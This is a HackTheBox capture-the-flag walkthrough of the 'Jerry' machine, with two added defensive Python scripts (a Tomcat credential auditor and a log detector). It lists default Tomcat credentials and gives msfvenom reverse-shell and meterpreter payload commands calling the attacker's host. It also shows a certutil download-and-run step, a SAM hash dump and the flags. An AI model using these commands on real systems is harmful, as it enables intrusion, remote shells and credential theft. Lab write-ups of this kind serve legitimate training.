Walkthrough of HackTheBox VM "Jerry".

So, as usual we're kicking off with NMAP.

nmap -A -T4 -p- 10.129.125.234

Nmap scan report for 10.129.125.234
Host is up (0.034s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

So, we got Apache Tomcat 7.0.88. Let's search Google for CVEs, exploits, and maybe some default creds for Tomcat.

Apache Tomcat 7.0.88 CVE

https://www.cvedetails.com/cve/CVE-2019-0232/
https://www.cvedetails.com/cve/CVE-2019-0221/
https://www.cvedetails.com/cve/CVE-2018-11784/
https://www.cvedetails.com/cve/CVE-2018-8034/
https://www.cvedetails.com/cve/CVE-2018-8014/

Exploits

https://www.rapid7.com/db/modules/exploit/windows/http/tomcat_cgi_cmdlineargs/

Default creds for Tomcat

https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown

Username   Password
admin      password
admin      (blank)
admin      Password1
admin      password1
admin      admin
admin      tomcat
both       tomcat
manager    manager
role1      role1
role1      tomcat
role       changethis
root       Password1
root       changethis
root       password
root       password1
root       r00t
root       root
root       toor
tomcat     tomcat
tomcat     s3cret
tomcat     password1
tomcat     password
tomcat     (blank)
tomcat     admin
tomcat     changethis

Try to log in to the Tomcat manager, and you'll find out that admin/admin and tomcat/s3cret work, so now we can log into the server and study it. You will find we can deploy apps on it, in the WAR format. Hmm.. maybe a shell? msfvenom to the rescue, time to play.
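From the defender's side, the lesson of the credential list above is that the account file should never contain any of those pairs, and above all not on an account that holds a manager role (because, as the rest of this walkthrough shows, a manager login is one WAR upload away from code execution). The script below is an added example for this write-up, not code from the original post or from the Tomcat project: it parses a constructed tomcat-users.xml, checks every user against the default credentials quoted above, and reports the ones that also carry a deploy-capable role.

```python
"""Audit a Tomcat tomcat-users.xml against the default credential list above.

Added example for this walkthrough; not part of the original post or of
Tomcat itself. SAMPLE_TOMCAT_USERS is a constructed file, and DEFAULT_CREDS
is the list quoted in the write-up (a blank password is the empty string).
"""
import xml.etree.ElementTree as ET

# Default username/password pairs quoted above; "" means a blank password.
DEFAULT_CREDS = {
    ("admin", "password"), ("admin", ""), ("admin", "Password1"),
    ("admin", "password1"), ("admin", "admin"), ("admin", "tomcat"),
    ("both", "tomcat"), ("manager", "manager"), ("role1", "role1"),
    ("role1", "tomcat"), ("role", "changethis"), ("root", "Password1"),
    ("root", "changethis"), ("root", "password"), ("root", "password1"),
    ("root", "r00t"), ("root", "root"), ("root", "toor"),
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("tomcat", "password1"),
    ("tomcat", "password"), ("tomcat", ""), ("tomcat", "admin"),
    ("tomcat", "changethis"),
}

# Roles that let an authenticated user deploy a WAR, i.e. run code on the host.
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui"}

# Constructed sample: two weak accounts (one of them the tomcat/s3cret pair
# that works on this box) and one account with a long random password.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="admin" password="admin" roles="manager-script,manager-gui"/>
  <user username="ops" password="Zq8!vL2#pR9wT4x" roles="manager-script"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text, min_length=12):
    """Return a list of (username, reason) for accounts that should be fixed.

    A user is reported when its username/password pair is in DEFAULT_CREDS or
    when the password is shorter than min_length; the reason also names any
    deploy-capable roles the account holds, since those are the dangerous ones.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        # Match on the local tag name so the default namespace does not matter.
        if elem.tag.split("}")[-1] != "user":
            continue
        name = elem.get("username") or elem.get("name", "")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if (name, password) in DEFAULT_CREDS:
            reason = "default credential"
        elif len(password) < min_length:
            reason = "short password"
        else:
            continue
        deploy = roles & DEPLOY_ROLES
        if deploy:
            reason += " with deploy role " + ",".join(sorted(deploy))
        findings.append((name, reason))
    return findings


if __name__ == "__main__":
    for name, reason in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{name}: {reason}")
```

Run it against the real file (conf/tomcat-users.xml under the Tomcat install directory) by reading that file into a string instead of SAMPLE_TOMCAT_USERS; on this box the tomcat/s3cret line alone would have been enough to flag the host.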

msfvenom -p java/shell_reverse_tcp lhost=10.10.14.33 lport=4321 -f war -o pwn.war

Now, we need a listener to catch that shell, so fire up netcat.

nc -lvnp 4321
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4321
Ncat: Listening on 0.0.0.0:4321
Ncat: Connection from 10.129.125.234.
Ncat: Connection from 10.129.125.234:49192.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

We got a shell, and it's running as system. Now, let's build on that, and get a meterpreter shell.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.33 LPORT=5555 -f exe > sh.exe

Now, we need a listener for meterpreter to connect back to, so let's do that right now. Start up msfconsole and set up the listener.

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.33
LHOST => 10.10.14.33
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > run

Okay, now we have a listener for meterpreter running, so we have to switch our attention to the Windows server for a moment. We need to copy our sh.exe to the server and execute it, so we get meterpreter back, but how do we do that since we only have a normal shell? The idea is to use python on our attacker machine to host a webserver, and certutil on the server to copy sh.exe over. Jump into the folder where sh.exe is, and launch python.

└─# python3 -m http.server 8080         
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

And on the server, in our limited shell, let's get our meterpreter payload and run it.

certutil -urlcache -f http://10.10:8080/sh.exe 
****  Online  ****
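Both of the steps used so far leave clear traces on the target: the manager login attempts and the WAR upload land in Tomcat's access log, and the certutil download shows up as a process-creation event with an unusual command line. The script below is an added example for this write-up (not code from the original post, Tomcat, or Metasploit) that runs simple detections over constructed log lines: a burst of 401s against /manager/ from one address, a successful call to the manager's deploy endpoints, and certutil being run with -urlcache against a URL. The log format follows Tomcat's default AccessLogValve pattern; the command lines imitate what a Sysmon Event ID 1 or a 4688 event would carry.

```python
"""Detect Tomcat manager abuse and certutil downloads in constructed logs.

Added example for this walkthrough, not from the original post. The access
log lines use Tomcat's default pattern (%h %l %u %t "%r" %s %b) and are
constructed; so are the process command lines.
"""
import re
from collections import Counter

# Constructed Tomcat access log: five failed manager logins, then a login,
# an upload through the manager form, and a request to the new app.
TOMCAT_ACCESS_LOG = """\
10.10.14.33 - - [26/Apr/2021:14:40:01 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.33 - - [26/Apr/2021:14:40:02 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.33 - - [26/Apr/2021:14:40:03 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.33 - - [26/Apr/2021:14:40:04 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.33 - - [26/Apr/2021:14:40:05 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.33 - tomcat [26/Apr/2021:14:40:06 +0200] "GET /manager/html HTTP/1.1" 200 13010
10.10.14.33 - tomcat [26/Apr/2021:14:41:10 +0200] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 302 -
10.10.14.33 - tomcat [26/Apr/2021:14:41:11 +0200] "GET /pwn/ HTTP/1.1" 200 0
192.0.2.7 - - [26/Apr/2021:14:42:00 +0200] "GET /docs/ HTTP/1.1" 200 5121
"""

# Constructed process command lines; only the first is a download.
PROCESS_CMDLINES = [
    r"certutil -urlcache -f http://10.10.14.33:8080/sh.exe",
    r"C:\Windows\System32\certutil.exe -hashfile C:\tmp\setup.msi SHA256",
    r"cmd.exe /c dir",
]

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Manager endpoints that deploy an application (HTML form and text interface).
DEPLOY_PATHS = {"/manager/html/upload", "/manager/text/deploy", "/manager/deploy"}


def detect_manager_abuse(log_text, auth_failure_threshold=5):
    """Return (alert, source_ip, timestamp) tuples, in log order.

    'manager-auth-bruteforce' fires once when one address reaches the 401
    threshold on /manager/; 'war-deploy' fires on every successful deploy call.
    """
    failures = Counter()
    alerts = []
    for line in log_text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ip, status = m["ip"], int(m["status"])
        path = m["path"].split("?")[0]  # drop the CSRF nonce and other params
        if path.startswith("/manager/") and status == 401:
            failures[ip] += 1
            if failures[ip] == auth_failure_threshold:
                alerts.append(("manager-auth-bruteforce", ip, m["ts"]))
        if path in DEPLOY_PATHS and status in (200, 302):
            alerts.append(("war-deploy", ip, m["ts"]))
    return alerts


# certutil invoked with -urlcache and a URL on the command line.
CERTUTIL_DOWNLOAD_RE = re.compile(
    r"certutil(?:\.exe)?\b.*-urlcache\b.*\b(?:https?|ftp)://", re.IGNORECASE
)


def detect_certutil_download(cmdlines):
    """Return the command lines that use certutil's URL cache as a downloader."""
    return [c for c in cmdlines if CERTUTIL_DOWNLOAD_RE.search(c)]


if __name__ == "__main__":
    for alert in detect_manager_abuse(TOMCAT_ACCESS_LOG):
        print(alert)
    for cmd in detect_certutil_download(PROCESS_CMDLINES):
        print("certutil download:", cmd)
```

The two detectors are deliberately independent: the access-log one is enough on its own to catch the manager deploy, while the certutil one catches the second-stage download whatever the first stage was. On a real host the access log lives under Tomcat's logs directory (localhost_access_log.*.txt by default) and the command lines come from your endpoint telemetry.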

c:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users\Administrator\Desktop\flags

04/26/2021  10:51 PM    <DIR>          .
04/26/2021  10:51 PM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
04/26/2021  10:51 PM           206,848 sh.exe
               2 File(s)        206,936 bytes
               2 Dir(s)  27,599,491,072 bytes free
# RUN IT 

sh.exe
[*] Started reverse TCP handler on 10.10.14.33:5555 
[*] Meterpreter session 1 opened (10.10.14.33:5555 -> 10.129.125.234:49199) at 2021-04-26 14:53:06 +0200

meterpreter > show sessions
[-] Unknown command: show.
meterpreter > sysinfo
Computer        : JERRY
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : HTB
Logged On Users : 0
Meterpreter     : x64/windows
meterpreter > 

meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : JERRY
SysKey : 777873202c520da6e5ce6f10e419892b
Local SID : S-1-5-21-2323042369-1334567395-6350930

SAMKey : f9949362f1f1bada77d23e7d6370d3d6

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: fe34b627386c89a49eb254f6a267e4d9

RID  : 000001f5 (501)
User : Guest

So, we're done. Let's find some flags.

c:\Users\Administrator\Desktop\flags>type "2 for the price of 1".txt
type "2 for the price of 1".txt
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
c:\Users\Administrator\Desktop\flags>
